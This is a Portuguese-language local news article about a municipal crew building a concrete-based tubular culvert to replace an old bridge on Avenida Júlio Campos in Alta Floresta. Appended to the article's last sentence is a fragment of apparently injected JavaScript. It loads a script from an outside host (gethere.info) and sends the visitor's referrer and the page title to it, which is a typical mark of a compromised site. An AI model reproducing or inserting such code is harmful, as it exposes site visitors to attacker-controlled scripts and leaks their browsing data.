Capa / Em Destaque / Construção de bueiro avança na Avenida Júlio Campos

Construção de bueiro avança na Avenida Júlio Campos

Construção de bueiro avança na Avenida Júlio CamposSegue em ritmo acelerado a construção de um bueiro tubular, com base de concreto, na Avenida Senador Júlio José Campos, no Bairro Novo Horizonte em Alta Floresta. Na última sexta-feira, 22, a Secretaria Municipal de Infraestrutura (SINFRA) concluiu a instalação dos tubos e iniciou a construção das paredes de contenção nas duas extremidades.

Os 36 tubos de um metro e meio foram instalados sobre uma base de concreto que foi construída em cima de uma estrutura de pedra (o chamado rachão), com aproximadamente meio metro de grossura.

A base de concreto tem 16 metros de comprimento por 6 metros de largura, vinte centímetros de espessura e foi reforçada por uma armação de ferro, tendo sido projetada para suportar o peso da tubulação, do aterro e da pavimentação que será construída após a conclusão do bueiro. A obra envolve cerca de 10 funcionários, caminhões basculantes e uma PC Escavadeira.

A construção de um bueiro tubular foi orientação do Departamento de Engenharia da Prefeitura de Alta Floresta. A vistoria realizada na estrutura da antiga ponte, que havia sido construída há mais de 13 anos de forma mista (madeira e concreto) constatou que não existiam as mínimas condições para obras de reparos e a solução seria substituir tudo por um bueiro tubular. O bueiro deverá ser concluído nos próximos dias.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top